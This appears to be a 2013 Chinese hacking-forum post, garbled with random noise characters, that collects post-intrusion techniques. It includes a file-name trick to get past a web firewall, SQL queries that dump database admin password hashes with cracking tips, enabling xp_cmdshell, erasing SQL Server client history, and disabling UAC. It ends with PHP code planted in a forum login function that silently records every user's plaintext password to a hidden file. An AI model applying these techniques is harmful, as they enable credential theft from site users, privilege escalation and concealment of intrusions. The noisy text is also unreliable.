9 @# S% \8 B. d. U: H' U Q0 L) m就是搜索case ‘login’8 c5 n; \1 I. ]
在它下面直接插入即可,记录的密码生成在pwd.txt中,
% g; F: T3 Z' S; W其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录( z9 b$ p% c: H) [: v l$ m1 s
利用II6文件解析漏洞绕过安全狗代码:
_/ I# W, a; B+ P+ z0 P: I;antian365.asp;antian365.jpg
4 M- U" R; ?0 w% L; M
$ ^( R# I# Z& U: x6 t各种类型数据库抓HASH破解最高权限密码!
+ {" F1 x( ^) R6 `1.sql server2000
5 V* `2 e5 \$ j" H4 q! F3 BSELECT password from master.dbo.sysxlogins where name='sa'
9 V8 D, p- y/ R! g- e0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
( P) K. b+ r# \% g% E Y2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
- d' e7 Z/ X- w1 X5 G& q9 D% {" c' U: b
0×0100- constant header) O' Y7 M+ a/ A: U; z9 e9 T/ R
34767D5C- salt$ u& f1 v3 A8 i o
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
4 N9 V, C2 m$ U& z, |" O2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash3 p Q2 O. D0 a6 W
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash# P% m# C# ?4 M- _
SQL server 2005:-- j# v7 {2 B/ m
SELECT password_hash FROM sys.sql_logins where name='sa'+ |% Z* a; _" d6 p( H5 ~4 t2 ]* X
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F7 l" X h/ Q* E- s- Z
0×0100- constant header" P1 d6 m7 n% U; ~) N, v& `1 g R
993BF231-salt0 P$ U: m: i' F+ Y5 N8 j) o$ D
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
1 v/ x6 ?6 @1 ?' ~, i9 O3 wcrack case sensitive hash in cain, try brute force and dictionary based attacks.
1 Y8 D+ S4 i8 p1 k. u" M" Q) p$ P# n {" Y
update:- following bernardo’s comments:-) P) f% M( M& _
use function fn_varbintohexstr() to cast password in a hex string.
! }- e$ Z: U" Ae.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
# ]# u: i; Y- |
! T/ L+ h& u' @7 y9 ?6 HMYSQL:-
. s3 g' U+ p8 |4 Y( J( w
, U5 l2 I7 [1 r2 g+ {6 UIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.7 Q; z- L& U" e8 U4 z
3 u: y, s1 ]. O*mysql < 4.1+ _2 t! A; Y6 M0 b. G& W, D
9 F5 ^6 c, [+ _: j( z, C) x' Bmysql> SELECT PASSWORD(‘mypass’);' D- X4 \. V, @5 `
+——————–+
6 N% A3 v- ~0 C! Y| PASSWORD(‘mypass’) |; o; u) c1 `' |6 ?. Q$ |
+——————–+: Y7 i3 q2 D) T0 G
| 6f8c114b58f2ce9e |
: }$ F; j% K$ y2 Z0 [. m* ^+——————–+7 _5 w/ z3 C3 C
$ ]2 A W9 J4 u! A
*mysql >=4.16 W' u' T. P- K# G
+ O( Z. t5 X- t! Y$ ^7 x
mysql> SELECT PASSWORD(‘mypass’);
$ R6 \# A0 j+ w0 e6 ?0 C' R% Q+——————————————-+, ^ I0 O8 i- G2 B. {- S0 Y' M
| PASSWORD(‘mypass’) |. r9 b* @" }3 e Q2 t N
+——————————————-+
8 T& ^+ b7 k: R& k I) F+ [; p* l5 s| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |8 M. D* o9 I! I
+——————————————-+) b0 V& n2 Q2 s+ l
9 i8 e- p& l' g: @5 u9 JSelect user, password from mysql.user
; R: i# {& R" s: ^The hashes can be cracked in ‘cain and abel’
5 z, B' r q8 {- Z4 [+ H
2 ?4 T4 A2 t; A. x0 f6 _3 z' ` e& zPostgres:-
+ O# T" H* g5 GPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
3 ]5 a4 B) |% oselect usename, passwd from pg_shadow;" Q4 i) g9 I) A" K9 t3 ~+ p# D4 z# n
usename | passwd. z: n2 k- ]: W7 W
——————+————————————-
1 K4 S$ y2 I5 O7 z- ttestuser | md5fabb6d7172aadfda4753bf0507ed4396+ I( n4 X* E9 f u( A7 @: p
use mdcrack to crack these hashes:-
% \) E4 _, Q) p7 f( Q$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
: f2 U9 k2 B$ }7 J' t4 f
: j1 r+ @& j) v0 U1 o+ wOracle:-
p, `+ O# D* x9 M. |1 c, Bselect name, password, spare4 from sys.user$
( L7 A1 {. P) zhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g& }3 `! Q% s9 M3 D1 Y* J
More on Oracle later, i am a bit bored….
# n5 e" f3 a1 X; ~! X/ Y( \7 n7 X- q( B
3 c+ Q* e# P9 l2 i. s% R
在sql server2005/2008中开启xp_cmdshell
& `+ T0 j H. c0 H( q i8 b-- To allow advanced options to be changed.
/ n+ K" ]5 O2 e2 L1 b- ?5 V+ o% IEXEC sp_configure 'show advanced options', 1
6 X+ a# Z* L" L+ ^/ k4 k4 {GO# u1 o1 W/ c* l
-- To update the currently configured value for advanced options.
& {+ h. S# _0 u6 QRECONFIGURE' N. g4 u3 H" [- V! ?7 G8 m
GO
9 D C( ^ ?7 }9 u& ~! e$ o; w-- To enable the feature.- q5 P( n! Q; j0 l$ M9 w
EXEC sp_configure 'xp_cmdshell', 15 J% S0 a5 A2 F$ y7 ~6 j. V3 z5 X8 }
GO
, ]5 n4 H# M3 d" M, T3 r0 Y-- To update the currently configured value for this feature.) [; R. ?* x, k$ `1 \
RECONFIGURE' b8 b, A% w |" K
GO
6 X9 h8 g2 x8 C" B& JSQL 2008 server日志清除,在清楚前一定要备份。7 G: ]5 w; E! A! y( R' y
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:3 J) }, h9 B# }8 N( _+ F9 }
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin6 L: ?9 W: e, u" X3 V
+ \% e# L3 @% o. m( a1 J- b对于SQL Server 2008以前的版本:
' C. ?* N! a- N/ R: \SQL Server 2005:
: v3 }2 C. ]6 s k. x8 f% W) A删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
4 g- L6 [9 f% f4 NSQL Server 2000:
5 D- \: Y, l4 Y) V W! G清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
0 m1 n! [/ p' B8 w! y1 o' U6 E& r1 G
2 C+ ]9 a: i+ c0 g% g本帖最后由 simeon 于 2013-1-3 09:51 编辑5 w" @# J* U1 u% i6 S, z
# F* {- b7 |! R- @ i! d
! B! b7 D' X7 A9 P2 [2 bwindows 2008 文件权限修改
; Q, A" x$ e. Z* c5 U1 f4 d" U" S1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx+ e& [, `% m2 X3 L
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad985 K; q& T8 [8 y- O
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,: ~. _2 c* q6 ~5 W8 ^' O3 ?
: }; t9 O" M t3 g. U
Windows Registry Editor Version 5.00
. S1 {9 _/ Q5 v9 J" v- N[HKEY_CLASSES_ROOT\*\shell\runas]+ T! t4 ^8 [" C* k
@="管理员取得所有权"
2 L) b0 L K4 Z( X x8 x! ^"NoWorkingDirectory"=""
/ t* S3 o( N; l9 n' `: R5 d[HKEY_CLASSES_ROOT\*\shell\runas\command]
: j9 T; O: O- S( x9 G: Q1 M) v0 q1 a@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"8 s: A1 J \8 L5 M8 }# r1 M) K, A2 U1 i
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
# z$ p7 S! D6 V$ H[HKEY_CLASSES_ROOT\exefile\shell\runas2]; y# K3 D+ J& E; w& i; C
@="管理员取得所有权"
+ I5 M9 }7 Y/ u% Y"NoWorkingDirectory"=""/ K- n- t+ m( d: `8 R% V/ r
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
$ ]0 c) i( ?$ i" }$ ?* ]7 N@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"* @8 p e4 N7 v3 ^6 N& J9 J
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
5 R: N: e: r7 q: }7 F
! E5 b; u' U& N6 E1 ^& ^- Y[HKEY_CLASSES_ROOT\Directory\shell\runas]+ b6 K5 n' W3 Q+ K5 Z
@="管理员取得所有权") f! A: }: f; g9 e9 } S/ d( z! ?
"NoWorkingDirectory"=""0 \% j+ m6 X5 s6 X1 m( a
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]( F6 ^5 d$ X4 Y# J3 B" u
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
& d) z4 U* i6 n: Z _"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"; i3 c( c: ^8 X$ ]/ B) o$ x5 Y* w
3 b7 E) n7 X( G& ]8 R
& ?3 Y7 K( o+ O2 E/ a6 i% l' bwin7右键“管理员取得所有权”.reg导入
( g! W6 f6 z' M8 ^二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
8 {$ ^, Z: u. {2 t: g# i1、C:\Windows这个路径的“notepad.exe”不需要替换
) P0 O8 _0 u7 v3 U% |2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
/ s R* A. ]2 Y3、四个“notepad.exe.mui”不要管4 b/ N: f0 S& u! T3 U0 M
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
* k- E& \+ G- m% O. f& lC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
; P5 I- n: ?5 C, {1 _替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,. C/ o% A' q; x& S
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
, P8 Y9 u) A( G0 K: s1 Q5 w- hwindows 2008中关闭安全策略: / r5 y. b4 @9 H% R u+ _
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f T: e* f$ Z6 A, e4 x" y) l4 b
修改uc_client目录下的client.php 在
; i9 Y, J( ~' A( W1 ufunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
4 z. B, H: K# C* E" l下加入如上代码,在网站./data/cache/目录下自动生成csslog.php I5 }6 B! ^) \7 x* J
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
9 N/ h, g. Y8 s" U. \if(getenv('HTTP_CLIENT_IP')) {
% _1 G. {( |) b4 H+ L# H$ e; |$onlineip = getenv('HTTP_CLIENT_IP');. L4 P! A2 z: q- |' D
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
* T/ e, ~+ u* b8 X0 L$onlineip = getenv('HTTP_X_FORWARDED_FOR');9 _# K" a* V% [9 J/ | A
} elseif(getenv('REMOTE_ADDR')) {
1 {7 \9 }9 M) d5 a1 C$onlineip = getenv('REMOTE_ADDR');% A3 C V, o$ M" q& i2 z
} else {
) q% n, n; Y/ q0 s& {" i p$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];' G" h. r" h& L. R
}
0 [% S4 l. |0 O $showtime=date("Y-m-d H:i:s");
! C' \7 I9 Z4 r. L/ j: x $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";: _2 j/ V p& \/ U( ]7 y& H
$handle=fopen('./data/cache/csslog.php','a+');8 h) f" q: g" A d' N
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对